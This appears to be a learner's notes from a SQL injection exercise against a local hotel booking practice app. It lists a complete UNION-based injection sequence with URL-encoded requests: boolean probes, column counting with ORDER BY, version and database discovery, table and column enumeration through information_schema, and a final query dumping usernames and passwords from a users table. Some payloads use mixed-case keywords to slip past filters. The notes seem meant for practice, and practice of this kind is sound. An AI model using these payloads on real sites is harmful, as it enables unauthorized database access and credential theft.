1' and 1=1 #
http://localhost:8080/room_information.php?id=1%27+and+1%3D1+%23&Submit=Submit#

3 and 1=0 #
http://localhost:8080/room_information.php?id=3+and+1%3D0+%23&Submit=Submit#


1' order by 1 #
http://localhost:8080/room_information.php?id=1%27+order+by+1&Submit=Submit#

1' order by 1000 # error!
http://localhost:8080/room_information.php?id=1%27+order+by+100000&Submit=Submit#

----------
1' union select 1,2,3
http://localhost:8080/room_information.php?id=1%27+union+select+1%2C2%2C3&Submit=Submit#

1' union select version(),user(),database() #

http://localhost:8080/room_information.php?id=1%27+union+select+version%28%29%2Cuser%28%29%2Cdatabase%28%29+%23&Submit=Submit#

1' union select null,table_name,null from information_schema.tables #

http://localhost:8080/room_information.php?id=1%27+union+select+null%2Ctable_name%2Cnull+from+information_schema.tables+%23&Submit=Submit#

---------


1' UniOn selEct 1,table_name,2 frOm information_schema.tables where table_schema ='hotel' #

http://localhost:8080/room_information.php?id=1%27+UniOn+selEct+1%2Ctable_name%2C2+frOm+information_schema.tables+where+table_schema+%3D%27hotel%27+%23&Submit=Submit#
-----------------


1' UniOn selEct 1,column_name,2 frOm information_schema.columns where table_name ='users' #

http://localhost:8080/room_information.php?id=1%27+UniOn+selEct+1%2Ccolumn_name%2C2+frOm+information_schema.columns+where+table_name+%3D%27users%27+%23&Submit=Submit#


---------------
1' UniOn selEct username,password,last_name frOm users #
http://localhost:8080/room_information.php?id=1%27+UniOn+selEct+username%2Cpassword%2Clast_name+frOm+users+%23&Submit=Submit#

